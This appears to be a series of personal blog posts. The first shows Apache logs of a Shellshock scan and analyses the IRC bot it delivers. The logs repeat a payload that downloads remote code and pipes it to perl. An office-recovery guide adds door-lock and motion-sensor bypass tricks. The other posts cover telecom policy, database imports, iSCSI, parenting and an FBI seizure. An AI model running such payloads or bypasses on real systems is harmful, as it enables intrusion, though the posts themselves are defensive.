Decode of IRC bot deployed by shellshock vulnerability

Today I saw a shellshock scan against my apache logs:

[Mon Nov 03 16:43:02 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/vpasswd.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:14 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/tigvote.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:43:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/smartsearch, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:17 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/newsdesk.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/musicqueue.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:23 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mt-static, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/mmstdod.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:32 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/main.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:48 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ImageFolio, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:44:55 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/html2chtml.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:21 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/ezshopper, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:45:34 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/dfire.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:19 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/book.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:28 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/bb-rep.shHTTP
[Mon Nov 03 16:46:38 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auktion.cgi, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl
[Mon Nov 03 16:46:39 2014] [error] [client 159.226.170.29] script not found or unable to stat: /usr/lib/cgi-bin/auction, referer: () { :; }; wget -qO - http://202.143.160.141/lib21/index.cgi | perl

What this means in layman's terms is that the requester seems to think I'll execute the code in the referrer header (some CGI scripts would do this, especially with the bash vulnerability). What it wants me to do is go to that URL, download the code contained within, and execute it.

This is dangerous. I don't recommend it.  It's obsfucated by using base64 encoding. I changed the exec statement to a print, and output that to a file.  I zipped both and they are both here for forensic purposes.

It looks like the bot will change its name in the process table to one of the following:

my @rps = ("/usr/local/apache/bin/httpd -DSSL",
 "/usr/sbin/httpd -k start -DSSL",
 "/usr/sbin/httpd",
 "ksoftirqd/0",
 "khelper",
 "kblockd",
 "/usr/sbin/apache2 -k start",
 "kmpathd",
 "httpd",
 "/usr/sbin/acpid",
 "/usr/sbin/cron");

Then it will connect to the IRC server 'mboost.su' on port 443. It will join #shock and accept commands from 'M', 'st0n3d','x00' and 'jorgee'.

 

It accepts a myriad of commands to UDP flood hosts, portscan them, connect to arbitrary ports, reverse shell, and ctcp/msg/noticeflood anyone on the IRC server. It can also send emails from the  target machine, and download any arbitrary file.

If you haven't patched your server, keep your eyes out. Exploits are definitely in the wild.

Linux iSCSI initiator Notes

My own notes on the Linux iSCSI initiator – applicable to myself, but maybe also to you.

Discover IQNs from the portal

iscsiadm -m discovery -t st -p 192.168.0.x

Log into an IQN (attach it as a drive)

iscsiadm -m node --targetname "iqn.2002-02.com.xsadf:asdfasdf:freenas2:paulextent1" --portal 192.168.0.x --login

Do your thing

Log out of the IQN (make the device go away, from the OS standpoint)

 

iscsiadm -m node --targetname "iqn.2002-02.com.xsadf:asdfasdf:freenas2:paulextent1" --portal 192.168.0.x --logout

https://wiki.debian.org/SAN/iSCSI/open-iscsi  <– Debian's docs on this

“What’s that burning smell?”

In 2006, with a strong case of senior-itis after putting in notice at my last employer, I was asked to document a number of things I did regularly or special things that may be done incorrectly that would be helpful to know. One of the documents I can share, because it pertains entirely to nonexistent servers, non existing servers, and a building prior to the full dissolution of my previous employer's detroit office.

It's among my favorites, one I actually saved a copy of because I liked the sense of humor I had about what had (more than) once been a very frustrating task for me to perform.

“What’s that burning smell?”

A guide on how to recover the Detroit office from a full, extended power outage.

Paul Timmins

Okay, if you’re reading this document, you’re probably pretty screwed. Here’s a step by step guide.

Breaking into the office: (This is only necessary if the door controllers are not working right) [editor's note: they never work right]

  1. The holdmagnetsare rated for 300 pounds of lateral force. Don’t waste yourtimedinking with trying to pull them open. You’ll break the door first. You have two options:
    1. 1⁄4” – 1⁄2” steel rod, 1 meter long. (you can get this at home depot for a buck, it might be threaded, but who cares) Slip this through the crack between the door and the jamb, and use it to push the emergency exit button. It requires about 2 pounds of force, so a meterstick might not be sufficient.
    2. MacGuyver method. Heat up a party balloon under your arm until it’s about 85-90 degrees. Stick its mass through the door, and hold it by its neck. Inflate it with a drinking straw. Release the balloon, such that it flies in the path of the motion sensor. This may take several tries.
    3. The fire panel can override the perimeter locks. There are two ways to trigger this. One is to call property management and convince them to override your locks at the fire panel. Option two is left as an exercise to the reader.
  2. So you’re in. Now what? Well, that server room lock is failshut. You can’t operate it in a power outage, and there’s no fire panel override. It’s a 6 pin tumbler lock with no special warding. A locksmith (or me!) can open it in under 15 minutes with a simple set of lockpicks. Prop this door because it WILL relock.

Getting everything happy:

  1. Ensure you have power to the entire office. Getting halfway through this to find out that you only have power to half the room is not good.
  2. Air conditioning is critical. The room should be below 70F. If it is above 85F, do not continue until the AC has cooled the room. This can occur if the systems run off UPS for a while, because the AC is not on the UPS. If the AC isn’t spitting cold air out the vent by the door, turn the thermostat “OFF”, then to “COLD”, waiting 30 seconds between the toggle to avoid problems with the AC compressor. IF THE BUILDING LOSES PRESSURE TO THE CHILLERS, YOU MUST DO THIS STEP BECAUSE THE INTERLOCKS WILL SHUT OFF THE AC TO PREVENT DAMAGE, AND THE INTERLOCKS ARE RESET BY DOING THIS. BUILDING MANAGEMENT CANNOT HELP YOU WITH THIS – THE SERVER ROOM AC BELONGS TO TB.
  3. By now, you’re enjoying the fresh air. Make sure all computers are off, and then power on the UPSen. If they fully discharged, they’re going to have a lot of inrush current in the first 10 seconds, so you should do this step. It just might save you a blown breaker. (though I have not experienced this)
  4. Now we start powering up equipment. Power on all Ethernet switches. They are booted when all the lights are out but power, and maybe a few ports blinking away cheerfully. In 30 minutes you’ll be as happy as those little green lights are, so stay calm.
  5. Then power on the T1 router. It’s a Cisco 1700 series in the telecom rack. It is functional when you see W0 lit as active. If this is a regional power outage or natural disaster, check the back to make sure the alarm light isn’t illuminated. If it is, the T1 line itself is down. Call MCI/Verizon Business/AT&TMCI/Bell System, American Telephone and Telegraph, and related companies, depending on the level of telecom consolidation when you read this. The circuit is through UUnet as of this writing.
  6. Then power on the ASA. It is functional when the lights are doing their happy blinky thing.
  7. Power on DC3 and DC4. This will establish an AD tree relationship with San Mateo/San Francisco/Bunch of people screaming for help floating in the water after the “Big One”.
  8. Watch them come up on the KVM. Have a beer.
  9. Power on DC1DT and DC2DT, taking care not to spill your beer on the servers. DC2DT may take a waving of a dead chicken over top of it to properly boot as of this writing.
  10. Once those come up, make sure all raid enclosures in the office are plugged in and operating. Wave dead chicken as necessary.
  11. Power on ops-mon, FS3DT, and EX1DT.
  12. Power on PHONESYSTEM, ensuring both power supplies have power. Green LEDs are illuminated at the back of the power supply, right? This is very heat sensitive, so if you have to delay it to get the server room below 75 F, please do.
  13. Reset the doorlock controllers. They’re the big box with the ominous triangle printed on them on the wall above the keyboard for the phonesystem. Just yank their power, plug them back in, and listen in amusement as they do a little clicky dance with all the relays. The system is now reset and mostly operational.
  14. Power on the HP desktop across from the phonesystem. This dinky ass piece of crap is the badging machine. Log into it as local administrator, password is supplied elsewhere. Make sure that stupid dos window with the numbers counting comes up (it’s in the startup group, so it should!). Don’t close that. At this point, you can, in theory, rely on the door locks. Test them at the server room door.
  15. Power on the backup machine.
  16. Power on the rest of the computers. I just turn every computer in the room on to be safe.
  17. As a courtesy, power on the tenant’s crap. You don’t have to, but it builds goodwill and they’re more likely to give you favors. Seriously.
  18. Check your email. If it works, go home, or whatever.
Copyright Walt Disney Corporation, 1974

Michigan SB636 passed, allowing termination of landline phone service. Now what?

“Mr. Speaker and members of the House:

Today a disservice was done to the citizens of the State of Michigan. This bill hampers competition and allows a greedy large corporation to take advantage of some of the most vulnerable segments of our population. Senior citizens and lower income users deserve to be protected. In this case, they are not. I hope that in future votes my colleagues will take into consideration the long term effects of legislation that we pass.”

– Rep. LaVoy, Michigan House Journal 27 of 2014

On 3/11/2014, Senate Bill 636, as amended, was passed in the State House of Representatives of Michigan. For my post on the original bill, click here. (Please note there is an important amendment I'll be discussing below.)

Not all is lost. Numerous news reports (many of them sympathetic to AT&T's position, but it raised attention regardless), 19,000+ hits to this blog, attention from many other blogs and websites, and  outcry from numerous public safety, consumers rights groups, and competitive providers managed to hold off this law for almost 3 months. In that time, something that passed the state Senate in 2 days with a final vote of 31 yeas, 4 nays, 2 excused, and 1 abstain ended up passing the state House in nearly 90 days, with 71 Yeas and 39 nays, and only after being amended.

What was the amendment, and what does it do? Are we safe?

It adds onto the section that allows a provider to withdraw as a telephone company entirely (as long as there was a workable solution for 911 emergency calling in the area),  a section binding the withdrawing carrier to the FCC IP Transition order, should they choose to withdraw.  (This would apply whether it's a formal FCC IP Transition trial or not, until federal regulations are passed codifying the IP transition nationwide, which would likely supersede any state laws we have on the topic anyway, so we're only losing so much here)

Regulation of interconnection, wholesale access, and consumer issues would remain the purview of the MPSC, using the FCC IP Transition trial rules until the FCC passes its own final rules for the IP transition.

Have no illusions – this isn't the best case scenario for Michigan consumers, or competitive providers. But it's much better for them than the original SB636. The FCC IP transition order provides some consumer protection (but not a lot) by requiring applicants to prepare reports on the impact of transition for many different types of things, such as credit card terminals, heart monitors, etc. And it allows wholesale access to legacy network elements, so competitive providers could decide to provide legacy TDM/POTS equivalent service if there is market demand for it (and obviously in many places, there would be).

What it doesn't do is compel the RBOC/ILEC to provide those legacy TDM/POTS equivalent services. The upside for consumers is that there are carriers who would happily take that business from the ILEC (including the carrier I work for), and theoretically anyway, we'd be able to do so using our own equipment and the ILEC's wires.

The downside is, many subsidies would not be available to provide same, and CLECs don't necessarily have the sunk cost to provide this service cheaply (some do, in some areas). This could have a disproportionate impact on low-income families and rural customers, where there are fewer customers (or mostly low income customers who are paying the bare minimum the plans would offer) to subsidize a network build to provide a replacement product.

The FCC IP trials state there has to be protection of low-income/elderly/disabled customers, but I'm not certain what that would ultimately mean. Where are the cutoffs for low-income and elderly? What kind of price increases would be okay?

Smarter people than I have summarized the IP trial orders here.

The bill, because of the amendments, has to go back to the senate, where it is expected to be passed immediately, and the governor is expected to sign it. Rumors say that the governor pushed hard for these changes, as he did not want the original bill to be passed as written – nobody wants to be the governor that took away phones from elderly people, and gave away state level oversight of the largest public utilities in their state. Well, at least no governor with common sense, anyway.

Time will tell if these changes are enough to protect everyone. I'm not sure anyone with experience in the industry can tell you at this point where things will be by 2017 on these issues. It's notable that the Michigan IP transition laws would kick in right after the current presidential administration term limits out, and a new administration will take its place roughly 20 days after the law kicks in. Part of me can't help but think that AT&T will have their claws dug deeply into the backs of the nominees of both parties.

So is this the end? Are we screwed now?

No. Though many of these issues move to various other states, and the federal level. (AT&T often uses Michigan as a model for legislation in other places – HB4314 was used to prove that if similar legislation was passed in other states, they too would benefit from increased deployment of AT&T's U-Verse product, for example, and from increased investment in their state. AT&T expanded U-Verse deployment, and located more employees in Michigan as a reward for passing HB4314)

Additionally, with Network Neutrality changes, broadband data caps, and the consolidation of major industry players any ability to offer services over the broadband connection of a third party (such as Vonage, Aereo, Skype, Youtube, Hulu, and Netflix) is severely threatened. More independent carriers would let the free market figure out network neutrality, but with consolidation and things like SB636 (at least in its original incarnation, though we don't know what this new incarnation will really bring for certain) we impact the ability for new entrants to create proper competitive pressure. (Each of those links contains more information, and on most, an opportunity to voice your opinion).

As for the FCC's IP Transition policies, you still have an opportunity to lend your voice. DoctorOhhnoes points out in an earlier post that there is still an opportunity to comment on the transition with the FCC.

Numerous groups are working on things such as privacy from the NSA, SOPA censorship, overreaching copyright law, broadband data caps and lots of other things.

What would solve this entirely?

In short, what they call "Structural Separation" – this is when companies are split up between the side that maintains the outside plant infrastructure, and the company that provides voice and data services. The outside plant company would only care what customer belongs to whom as a technical necessity (ie: Where does this customer's wire, fiber optic cable, etc get hooked to in the central office? To AT&T's switch, or to another carrier?). They would own all the buildings, structures, and wires.

This company would be legally separate from any company providing data or voice services, much like AT&T long distance was broken off from the Bell system in 1984, but in this case we're taking it a step further – separating phone companies from the outside wires. AT&T would pay rent to be in the buildings under the same terms and conditions that competing carriers do, and be subject to the same outside plant conditions that the other carriers would.

Any improvements to the outside plant would be cost averaged across the combined customer base, and would affect all carriers equally. AT&T wouldn't benefit unduly from having a large embedded base (except from the usual economies of scale with billing, support, IP transport, and telephone service), and any carrier could roll out any technically possible service at any time.

The outside plant company would have an incentive to come up with better quality loops, better fiber optic penetration, better everything because carriers would demand that of them (and would work out a way to pay for it collectively, if necessary), and they would all benefit equally from the deployment. The outside plant company may even come up with better products to offer – for example, a wholesale VDSL2 DSLAM setup in the neighborhoods that any carrier could pay to use with their equipment to extend the reach. This would allow nearly any carrier to roll out a U-Verse like service overnight. Economies of scale would be spread across all market participants – Currently if 4 companies in a business park want service from 4 different carriers, each has to run their own fiber to the customer's building all the way back to a central point. A structural separated provider could run one 48 count cable to the business park, and hand all 4 carriers their own set of strands to each building. If a customer wanted to change carriers, or add a second, they'd be able to hook up unused capacity, or even swap a cable over from one carrier to another in the central office. This means the entire business park could benefit from that scale, and bringing the other buildings into the fold would be simplified, no matter what carrier they want to use.

It may sound utopian, but several countries are doing this today.

Imagine if your house had access to fiber optic services from 4-6 companies. Do you think people would still be talking about net neutrality and bandwidth caps? Heck no, because if one of those carriers sold capless products that worked well with everything, people could switch in a heartbeat to them. There's no sunk costs and no startup time. The company that tried to limit their customers unnecessarily would be out of business in a heartbeat.

TL;DR

Too much to read? Summary: AT&T managed to get their bill passed with some change due to consumer and citizen outcry. The changes are good, but not as good as not having the law at all.

While the future is uncertain, you still have influence, and there are many battles other than this one that can have similar impact on you, no matter who you buy your services through. I strongly urge you to weigh in on them with those who are in power (and many of them are actually listening, as this isn't a particularly partisan issue, and affects everyone!). I strongly urge people to pressure their legislators, and their friends, to become educated on the topics I mentioned above, and to push people to have positions on them, much like people do about things like abortion, gun control, social security, and other stuff. Almost everyone in the US uses a telephone or the internet daily, and what happens to these services matters a lot.

And if you haven't seen what the other side is capable of, I strongly suggest checking out my earlier post about AT&T's involvement with Astroturf groups here. Other sites discuss this in greater detail.

And to steal a line from Dr Seuss: “Unless someone like you cares a whole awful lot, Nothing is going to get better. It's not.”

Astroturf

How green is the astroturf over there?

A recent article in Fierce Telecom titled "Special access, end of PSTN no secret to wireline marketplace" , written by Bruce Mehlman was a response to an article written by Bruce Kushnick, who is no friend of the incumbent telephone companies, for sure.

But who is Bruce Mehlman and the organization he co-founded, the "Internet Innovation Alliance"? Good question.

The tone of the article would imply that they're an advocacy group for broadband by any means necessary – they want speed and don't care under what terms and conditions it's available, as long as it's "cheap".  Seems fair and innocent enough, from the "cheap, fast, good, pick two" – they chose cheap and fast. I disagree with this strategy, but more power to them.

But wait – what they're advocating is exactly what AT&T is trying to carry out with SB636 in Michigan. I can't help but think that's a bit odd, so I dig a bit to see what the story is with this "Internet Innovation Alliance" that I've never heard of before. What I found was interesting.

With some digging, I found their list of members.

I'll reproduce it here:

 

1 Economy Incorported Donor Supported by AT&T and Verizon
American Council of the Blind Donor AT&T and Verizon are major sponsors of their event.
The American Conservative Union Ideological Not specifically related to AT&T. Generally supports elimination of government regulations.
Applied Optoelectronics Supplier Supplier for AT&T and Verizon's FTTP products
Alcatel-Lucent Supplier/Common Origins One of AT&T's largest suppliers. Lucent was a spinoff of Bell Labs, which was at one time AT&T.
Americans for Tax Reform Ideological Not specifically related to AT&T. Generally supports elimination of government regulations.
AT&T Self The phone company. The people the organization speaks highly of in the op-ed.
B-Tech Supplier AT&T Supplier – AT&T's logo is right on their front page.
Berry Test Sets Supplier AT&T Supplier – Ironically provides premier test equipment for that "obsolete network" that they're trying to get rid of. Their techs carry this tool a lot.
Communications Technology Solutions / CBM of America Supplier AT&T Vendor
Ciena Supplier AT&T Vendor
Condux Supplier AT&T Vendor
CompTIA Indeterminate Not specifically related to AT&T, but AT&T is a large sponsor of theirs.
Connected Nation  AT&T related AstroTurf group Astroturf group heavily funded by AT&T. Even performs research for AT&T.
Corning Supplier Major AT&T Supplier of Fiber Optic Cable
United States Cattleman's Association Indeterminate, likely donor The site doesn't mention sponsors at all, but the cattlemen's association goes out of its way to file FCC comments all the time in support of various AT&T initiatives.
FiberControl Indeterminate Probably an AT&T supplier. Very niche equipment supplier.
GoFoton Supplier CTO worked at AT&T for 30 years, likely an AT&T supplier as well.
National Grange of the Patrons of Husbandry Indeterminate, likely donor Outspoken advocate of AT&T's policies. Major donors not mentioned on their homepage.
American Homeowners Grassroots Alliance Indeterminate, likely a front group AHGA and AHF Privacy Policy- AHGA and AHF will not disclose any information whatsoever about their members,
customers, or supporters to any other parties under any circumstances. – Advocate of AT&T policies in the past.
Hispanic Telecommunications and Technology Partnership Indeterminate, likely a front group Promotes many AT&T initiatives, ties to the NTCA and USTA. All positions seem to be related to AT&T initiatives.
Hispanic Leadership Fund Indeterminate, likely ideological Unknown, no public webpage, no known policy statements.
Independent Technologies Inc Supplier Supplier, ironically, of equipment for AT&T's "Obsolete" POTS/TDM network.
Independent Women's Forum Donor/Ideological AT&T is a donor to the IWF.  Generally supports elimination of government regulations.
Japanese American Citizens League Donor "Website made possible by the generous sponsorship of AT&T" (search in page for that string)
LCLAA Trade Union Trade Union group (Trade unions that deal with AT&T tend to support AT&T policy in exchange for promises to include their laborers in new initiatives)
LULAC
Donor/Ideological
AT&T is part of their "Corporate Alliance"
Intertribal Agriculture Council  Likely Donor Recently, the Intertribal Agricultural Council has been involved in many non-agricultural things, such as the AT&T and T-Mobile merger, and the Sirius XM merger. Why? Who knows.
MetroTel Corp  Supplier AT&T Supplier
Minerva Networks Potential Supplier Minerva sells IPTV middleware that controls IPTV set top boxes. AT&T uses Microsoft MediaRoom, but given that Microsoft has no interest in continuing that line, I suspect AT&T is working with Minerva at this point to replace MediaRoom.
National Assocation for Female Executives  Likely Donor Both NAFE and AT&T pat each other on the back a lot.
National Association of Neighborhoods  Likely Donor NAH has spoken heavily in favor of previous AT&T initiatives.
National Coalition on Black Civic Participation AT&T and CWA staff on board of directors
National Health IT Collaborative for the underserved Likely Donor They do not appear to have made any public statements in favor of AT&T initiatives, and appear to be otherwise legitimate.
National Black Chamber of Commerce Donor The AT&T Foundation has donated thousands to this group, if not more.
National Puerto Rico Coalition Donor AT&T is a primary sponsor.
National Spinal Cord Injury Association Likely Donor They do not appear to have made any public statements in favor of AT&T initiatives, and appear to be otherwise legitimate.
OASIS Institute Donor AT&T donated half a million dollars to this group.
National Utility Contractors Association Supplier Consortium of AT&T suppliers
Prysmian Cables and System Supplier Manufacturer of fiber optic cable
Small Business Entrepreneurship Council Ideological Possibly supported by AT&T, definitely ideologically opposed to government regulation.
Suimitomo Lightwave Supplier Fiber optic manufacturer
Sheyenne Dakota, Inc Likely Supplier They manufacturer wiring harnesses.
SeniorNet Donor AT&T and Verizon are sponsors.
SNC Manufacturing Supplier AT&T supplier of high voltage isolation equipment
Suttle Supplier Supplier of various telecommunications cabling and connectors. (Many punchdown blocks are made by Suttle)
Telesync Supplier Ironically, most of their products are for those old, evil POTS services they're trying to get rid of.
TechAmerica Consortium AT&T is a member
USIIA Consortium AT&T is involved with this group. Verizon has an employee on the board of directors. They have a history of speaking in favor of all AT&T initiatives, all the way back to the bell south merger.
Women Impacting Public Policy AT&T employees part of advisory board / Ideological Corporate Advisory Board has AT&T (and Comcast, who does not oppose these laws) members. Several.  Generally supports elimination of government regulations.
Asian Women in Business  Donor AT&T heavily sponsored this group

Now, to be clear, I don't think that taking a single dollar of AT&T's money taints you. But when you're part of a public policy group that is unrelated to your mission (What does this have to do with Indian agriculture, or cattlemen?), and you take money from AT&T, your opinion may be not as independent as you make it sound.

The thing with nonprofits is, they don't have an inherent means of self support. They rely on donors. If you get a big donor that seems awesome at first, it opens a lot of doors for you. When they ask for your support, and it doesn't seem completely unreasonable (just sign your name to this, it's going to pass anyway and we could really use your help, as we've helped you in the past) – few organizations can afford to say no, especially if it doesn't harm their constituency directly or go against their stated goals. It puts them in the unenviable position of either giving a large donor a hand over something inconsequential to their members/beneficiaries/whatever, or taking an unnecessary stand to say "This is tangential to our mission" and risk a pay cut.

Output of a MySQL select command

Importing Microsoft Access databases into MySQL under Linux

I needed to do this, and found the existing documentation somewhat lacking. My work will be on a file in the original MDB access format (not the newer XML based ones). I'm working on Debian Linux. Instructions for derivatives (such as Ubuntu) should be identical. Other distributions (Redhat Based) may use different package names (using the yum package manager should simplify this, but I have not tested these instructions under Redhat/CentOS/etc).

For the purposes of my example, I'll call my MySQL database "taco" and my Access file "nacho.mdb".

Where I say "(creds)" you place any connection information you may usually need – an example would be "-h database.yourdomain.com -u youruser -pyourpassword"

First, install the mdbtools package:

apt-get install mdbtools

Answer the questions as appropriate.

Create a new database to hold these files:

optional, but suggested. You can always move tables around later.

mysqladmin (creds) create taco

Build empty tables to house all your data, using the Access schema:

This creates empty tables with the same names, structures, and datatypes (or their equivalents) as the access database.

mdb-schema nachos.mdb mysql | mysql (creds) taco

Copy all the data over:

I asked for a tables list, comma delimited. Then I removed the trailing comma, then told xargs to run mdb-export for each table name in the file. BLAH is used as a placeholder, and is replaced by whatever table name it's working on. Please note the positions of commas and spaces are crucial to the proper operation of this command.

mdb-tables -d, -t table nacho.mdb |sed 's/,$//'|xargs -d, -I BLAH mdb-export -I mysql nacho.mdb BLAH|mysql (creds) taco

If you make a mistake:

I know, we're all perfect, right? But let's pretend …your friend… makes a mistake, or encounters a correctable error in processing. The easiest thing to do is dump the mysql database and start all over (you did create a new database just for this, right?)

mysqladmin (creds) drop taco

Answer "Y" and push forward. Only by losing everything are we free to do anything. That's what you'll tell yourself to feel better about the time wasted by starting over. Unless you know what you're doing, I promise you this is the easiest, quickest way.

How do you feel about drugging your kid?

It's no secret that our son has sleep problems. I had (hah! okay, so HAVE) severe sleep issues, and he does too.

We followed all the rules. Feed him early, give him a pre-bed snack. Bathing (not generally a relaxing experience for anyone around here). Warm "milk" (for us, it'd be rice or almond milk, as he's got casein and soy allergies). Making the whole house quiet before bed. Reading stories. Withholding nap time. Waking him early. Tiring him out.

Generally, he'll go to bed around 1-2am without assistance. Unless we have a long, dark car ride (for me these days with severe complex sleep apnea, these are really dangerous to do, so that's not happening – my sleep doctor's directives currently state that I should not be driving late at night) he'll usually be up and active the whole time. I often joke that the US could be independent of fossil fuels if we find a way to tap into his energy.

So after discussions with his doctor, we use an as-needed dose of Melatonin at night (we call them 'Magic Gummies', as they are in gummy form, like his vitamins), for about a year and a half now. I also use it periodically – while I have little trouble falling asleep at the wheel, I have problems falling asleep at night – in part because I use so much caffeine to stay awake and effective during the day. Yeah, in my case it's a self destructive loop, and I'm seeking medical intervention for my complex sleep apnea (3rd sleep study tomorrow, maybe it'll be the one where we find the right machine and settings for me!). But when I was a child, I had more or less identical sleep issues, so it's not JUST the caffeine.

Anyway, so it works great, and his teacher, aide and therapists can tell when he's been using it, and when we've had to get him to sleep naturally. But that doesn't stop people from judging us for using it. People give us looks of disapproval, or ask stuff like 'do you really have to drug your kid?' or *insert anecdote about someone else here*, then some judgmental comment about drugging him. Not just acquaintances, and friends, but family. It sucks, and it's stupid, and hurtful.

We've always treated it as a privilege, not some sort of punitive consequence. In fact, if he's been 'bad', we make him do something good to redeem himself in order to get one – like pick up a toy, or get mommy a glass of water, etc. They don't have a negative stigma attached here. We've never overtly told him what they're for, but that they're a special treat for 'good boys' on 'special nights'. We've gone out of our way to avoid saying what they're for, lest he protest taking them because he wants to stay up and play.

Lately he's been kind of warily asking for them proactively. I told Becky I suspect he knows what they are for and recognizes his need for one. She was skeptical, but tonight I asked him offhand – 'do you know what the magic gummies are for?'.

He says 'they help go night night'.

Damn right they do, kid.

My kid knows he needs help to fall asleep, and actively seeks it. I couldn't think of a more powerfully obvious statement of self advocacy than that.

So how do I feel about drugging my kid? I feel great, because I know I'm helping him satisfy a basic human need that he is now directly articulating his need for. I feel like our choice to give him this powerful tool to help him sleep has helped him behaviorally, educationally, and has soothed him when he was tired, sore and weary. And that our feelings that he would approve of the use of them if he understood what they were for have been validated.

I'd be off to take a magic gummy myself, but due to my upcoming sleep study (I'll have a whole post on this mess soon, once it's completely dealt with, because boy, it's been a long, strange ride) I'm not supposed to be doing that, so I'll go lie down and hope sleep comes quickly. Goodnight, all!

A helpful guide to my elementary school

So I wanted to write a piece for Autistics Speaking Day. I wrote this blog post that was well over 2100 words, and spoke to the idea of making sure that if a child is different, don't be their first bully. It went far deeper into things than I really feel comfortable talking about in public (not so much about my parents, who despite their faults are/were generally okay, but more about the absolutely hellish experience I had in elementary school – kindergarden through 6th grade. It spoke about involuntary restraint, seclusion, bullying (just about as much by the adults and the system as the kids), acting out violently, and wandering.)

I decided instead to publish this. I drew a helpful map of my old elementary school for non-typical children like I was, so they can easily navigate their days like I was able to. It's not really comprehensive, but it's a start.

A helpful guide to my elementary school

(Needless to say, I know exactly what to be hyper vigilant for as my child goes through school. And I know that my child's school nowadays has acceptable procedures for handling many of the issues I dealt with as a kid.)

The difference 2 words make

 

 

 

For the past nearly 10 years, I've been patiently waiting for a single event to happen. In November 2003, a ton of my personal belongings walked out the door of my apartment. I was told to forget about them forever. That the government would find a way to keep them, destroy them, or auction them.

I made it my personal goal to get that equipment back. I didn't have a lot of resources to fight that battle, and I still don't. Lawyers cost tons of money, far more than the equipment could ever be worth. But what walked out that day wasn't just a pile of equipment. It was 100% of my personal data I had ever collected, EVER, in the time I had computers. In that collection is floppy disks, hard drives, zip disks, DAT tapes, basically everything I had ever done from the time I first laid hands on a keyboard (or video camera, as they took all my VHS-C and SVHS tapes with raw footage on them too). I never really shot analog, so every photo I had ever taken, from my Polaroid PDC 640 onward, gone. I think I even have webcam shots, and pictures from our school's Sony Mavica in this pile of computers. Tons of scanned photos that were taken by others, from my first flatbed scanner.

Logs from some of the first BBSes I ever connected to. Some of the first programs I ever wrote.

And what they told me on that November day, is that all of this was gone forever. Even the stuff I wrote the week before. Back then we didn't have a cloud like you kids have nowadays. We had a garden hose and a sprinkler, and we got our rainbows that way, and we liked it… But seriously. If you woke up and someone said "all your stuff is stolen. We know where it is, but you'll never see it again. You need to let go and start over…."

Sure, you're thinking – why didn't you back it up? I did. On all the media that went out the door with it. DVD-RW, gone. DAT backups? gone. If it plugged into the wall, or stored a magnetic charge, it was fair game. They took my dreamcast games, for crying out loud.

So for years, I've been bugging the FBI any way I know how to find out where my belongings are, so I can go back and get them. For years, I'd get bounced around. I'd get referred to people who couldn't help. Irritated, I filed a FOIA/PA request, hoping to find any information about the whereabouts of my belongings (among other things). I was dismayed to find no information about the whereabouts of my belongings in the files.

But obviously it triggered something. I filed the request in July of 2012, and the response was (after a month of research time), well… literally stating that my FBI file was larger than the Bible. I got several CDROMs, which had interesting information (including the fact that they unsuccessfully continued to attempt to indict me for other crimes (I also did not commit) until 2009 with a standing grand jury. Yes, they had continued to fight to prosecute me for over 6 years afterward.). But nothing at all about the seizure except some notes they took during the raid.

I got my last CD from them in late December of 2012. In February 2013, I get a very upset call from Becky. "An FBI agent just left me a voicemail, he's looking for *YOU AND ME!* He didn't say why.". Obviously I immediately backed up a copy of everything I had offsite, then grabbed my phone and called the agent back, expecting the worst. … "I have some items we're looking to return to you. I need you to fill out some forms."

I don't have to tell you at this point my jaw just about hit the floor.

He went on to tell me about all these computers they found in a warehouse. Ones that belonged to me, from a case in 2003. I told him where to send the paperwork.

I get the letters a bit later, and my heart sank. They were authorization to return my computers, CONDITIONAL ON MY CONSENT TO WIPE THE DRIVES.

Because what I really want is the kind of computer I could afford in 2003, with no data on it. Yeahhhhhh.

It had a 30 day deadline. I redlined the sections providing consent to wipe the drives, initialed them and signed them, and sent them to the agent.

He calls and explains policy, and procedure. Tells me how lucky I am since "they don't have to return anything, according to my plea bargain"

I start to grin. Here's the turning point in that conversation.

Me: "Actually, according to my plea bargain, there's only one computer you don't have to return. The rest, I'm constitutionally entitled to due process to receive."

Agent: "Plea bargains always contain a forfeiture clause. It states we can dispose of the seized items however we like. We just like to give the opportunity to return them."

